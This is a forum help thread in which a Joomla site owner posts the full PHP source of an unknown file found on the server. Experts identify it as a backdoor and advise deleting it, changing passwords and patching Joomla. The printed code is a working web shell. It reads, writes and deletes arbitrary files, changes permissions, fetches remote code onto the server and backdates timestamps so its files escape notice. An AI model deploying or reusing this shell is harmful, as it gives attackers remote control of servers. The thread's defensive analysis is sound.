Solved

strange file suddenly appeared

Posted on 2013-12-14
10
544 Views
Last Modified: 2013-12-14
Hi,

I have a Windows 2008 server running PHP among other things. I have a Joomla site that I noticed today has a strange file added at my site root 4 days ago that I'm not sure what it is.

Obviously I'm alarmed, but I took a look at the file and I'm enough of a newb with PHP, I'm not entirely sure what it's all supposed to be doing or what it's origins might be. Can anyone have a gander and summarize what this is? It's a file called wp-sto.php but wordpress is not present on this site.

<?
ignore_user_abort(1);

$err_flg=$_GET['err'];
if ($err_flg==1) {error_reporting(-1);}
else {error_reporting(0);}

set_time_limit(300);

  if (isset($_GET['sc']) && ($_GET['sc'] == 1)) die(file_get_contents(__FILE__));
  if (isset($_GET['scmd5']) && ($_GET['scmd5'] == 1)) die(md5(file_get_contents(__FILE__)));
  if (isset($_GET['read']) && isset($_GET['write'])) {file_put_contents($_GET["write"],file_get_contents($_GET['read'])); die();}
  if (isset($_GET['read']) && !isset($_GET['write'])) die(file_get_contents($_GET['read']));
  if (isset($_GET['del'])) { unlink($_GET['del']); die();}

$else_dot=$_GET['else_dot'];
$flag_sum=$_GET['flag_sum'];
$chmod_name=$_GET['chmod_name'];
$chmod_mod=$_GET['chmod_mod'];
$chmod_mod=intval($chmod_mod, 8);
$f_creat_url=$_GET['f_creat_url'];
$f_creat_name=$_GET['f_creat_name'];
$f_del_name=$_GET['f_del_name'];
$folder_creat_name=$_GET['folder_creat_name'];
$folder_del_name=$_GET['folder_del_name'];
$tfilet=$_GET['tfilet'];

if ($flag_sum==1) {echo "734057843957";}

if ($tfilet)
	{
	atouch($tfilet);	
	}

if ($chmod_name)
   {
   if ($else_dot==1) {chmod ($chmod_name, $chmod_mod);}
   else
       {
       if ($else_dot) {chmod ("$chmod_name.$else_dot", $chmod_mod);}
       else {chmod ("$chmod_name.php", $chmod_mod);}
       }
   echo "ok chmod";
   }


if ($f_creat_url)
   {
   $new_vsn1="http://$f_creat_url";
   $new_vsn=getau("$new_vsn1");
   if ($else_dot==1) {$new_v_f=fopen("$f_creat_name","w+");}
   else
       {
       if ($else_dot) {$new_v_f=fopen("$f_creat_name.$else_dot","w+");}
       else {$new_v_f=fopen("$f_creat_name.php","w+");}
       }
   fwrite($new_v_f, "$new_vsn");
   fclose($new_v_f);
   echo "ok creat file";
   }

if ($f_del_name)
   {
   if ($else_dot==1) {unlink ("$f_del_name");}
   else
       {
       if ($else_dot) {unlink ("$f_del_name.$else_dot");}
       else {unlink ("$f_del_name.php");}
       }
   echo "ok del file";
   }

if ($folder_creat_name)
   {
   $flag_mkd = mkdir ($folder_creat_name, 0777);
   echo "ok make dir";
   }

if ($folder_del_name)
   {
   $folder_del_name=trim($folder_del_name);
   if ($folder_del_name<>"")
   {
   removeDirRec("$folder_del_name");
   echo "ok del dir";
   }
   }

function getau ($path)
{
 if (!function_exists ("file_get_contents"))
 {
  function file_get_contents ($addr)
  {
   $a = @fopen ($addr, "r");
   $tmp = @fread ($a, sprintf ("%u", @filesize ($a)));
   @fclose ($a);
   if ($a) return @$tmp;
  }
 }

 if (!function_exists ("file_put_contents"))
 {
  function file_put_contents ($addr, $con)
  {
   $a = @fopen ($addr, "w+");
   if (!$a) return 0;
   @fwrite ($a, $con);
   @fclose ($a);
   return @strlen ($con);
  }
 }
 $content = file_get_contents ($path);
 if ($content=="")
 {
  $curl = curl_init ();
  curl_setopt ($curl, CURLOPT_URL, trim($path));
  curl_setopt ($curl, CURLOPT_RETURNTRANSFER, 1);
  curl_setopt ($curl, CURLOPT_CONNECTTIMEOUT, 5);
  curl_setopt ($curl, CURLOPT_TIMEOUT, 5);
  $content = curl_exec ($curl);
  curl_close($curl);
 }
 if ($content!="")
 {
  return $content;
 }
}

function atouch($dist)
		{
		$dist = "$dist.php";
		$filetimefilec = "index.php";
		$ATime  = date('Y-m-d H:i:s',fileatime($filetimefilec));
		$MTime = date('Y-m-d H:i:s',filemtime($filetimefilec));
		if ( (!$cftime2=strchr($MTime,"200")) and (!$cftime3=strchr($MTime,"201")) )
			{
			$filetimefilec = "index.html";
			$ATime  = date('Y-m-d H:i:s',fileatime($filetimefilec));
			$MTime = date('Y-m-d H:i:s',filemtime($filetimefilec));
			}
		if ( ($cftime2=strchr($ATime,"200")) or ($cftime3=strchr($ATime,"201")) )
			{
			$MTime = filemtime("$filetimefilec");
			@touch($dist,$MTime,$MTime);
			}
		}
function removeDirRec($dir)
{
    if ($objs = glob($dir."/*")) {
        foreach($objs as $obj) {
            is_dir($obj) ? removeDirRec($obj) : unlink($obj);
        }
    }
    rmdir($dir);
}



?>

Open in new window


Any ideas?

Thanks
0
Comment
Question by:billium99
  • 3
  • 3
  • 2
  • +2
10 Comments
 
LVL 30

Expert Comment

by:Marco Gasi
ID: 39718988
I only toke a look, but if I were you I would immediately backup those file in my localhost for deeper analysis and then I would delete them from the server. Immediately.

Then I would talk with the hosting service provider. The code you posted above changes permissions, deletes files and these are thing only should do: if you're not sure about, don't trust it.

I don't know joomla, but I doubt any framwork can create such files: I repeat, copy them in an unoffensive location and delete them from the server, then talk with host provider.
0
 
LVL 1

Author Comment

by:billium99
ID: 39718997
Hmm - this is my dedicated server. File already moved offline.

Changes permissions in what way? Deletes which files?
0
 
LVL 82

Expert Comment

by:Dave Baldwin
ID: 39718999
Yes, get rid of that file.
0
 
LVL 30

Expert Comment

by:Marco Gasi
ID: 39719007
'Changes permissions in what way?': look at line 37. chmod changes permissions of files and directories.

'Deletes which files?': look at line 67. Unlink is the php command to delete files.
0
 
LVL 82

Assisted Solution

by:Dave Baldwin
Dave Baldwin earned 125 total points
ID: 39719053
And all that is done from data sent in the URL to that page.  That's where all the $_GET variables come from.  It is a way of remotely changing your web site without your permission.  Even deleting the whole thing.
0
Enabling OSINT in Activity Based Intelligence

Activity based intelligence (ABI) requires access to all available sources of data. Recorded Future allows analysts to observe structured data on the open, deep, and dark web.

 
LVL 82

Expert Comment

by:Dave Baldwin
ID: 39719059
And yes, someone broke into your server.  You should change passwords for all access.
0
 
LVL 30

Assisted Solution

by:Marco Gasi
Marco Gasi earned 125 total points
ID: 39719060
Yes, indeed. I was reading the code: really, I don't understand what exactly does in which sequence, but it seems to be a trojan horse: from a remote web server one bad guy intends to call that file passing it some parameter and do something bad like delete your files, even empty whole directories...

Change all password and provide security to your dedicated server, because it has been violated. I'm sorry.
0
 
LVL 34

Assisted Solution

by:gr8gonzo
gr8gonzo earned 125 total points
ID: 39719067
Make sure Joomla is also updated to its latest release for your major version. It's possible that a hacker doesn't know any passwords or hasn't actually hacked into your server yet but simply used a Joomla exploit to place a file to gain further access.
0
 
LVL 108

Accepted Solution

by:
Ray Paseur earned 125 total points
ID: 39719072
And look out for security exploits, especially in the plug-ins.
http://developer.joomla.org/security.html
0
 
LVL 1

Author Closing Comment

by:billium99
ID: 39719182
Thanks
0

Featured Post

Do You Know the 4 Main Threat Actor Types?

Do you know the main threat actor types? Most attackers fall into one of four categories, each with their own favored tactics, techniques, and procedures.

Join & Write a Comment

If you don't have the right permissions set for your WordPress location in IIS, you won't be able to perform automatic updates. Here's how to fix the problem.
When it comes to showing a 404 error page to your visitors, you do not want that generic page to show, and you especially do not want your hosting provider’s ad error page to show either. In this article, I will show you how to enable the custom 40…
Explain concepts important to validation of email addresses with regular expressions. Applies to most languages/tools that uses regular expressions. Consider email address RFCs: Look at HTML5 form input element (with type=email) regex pattern: T…
The viewer will learn how to look for a specific file type in a local or remote server directory using PHP.

760 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question

Need Help in Real-Time?

Connect with top rated Experts

19 Experts available now in Live!

Get 1:1 Help Now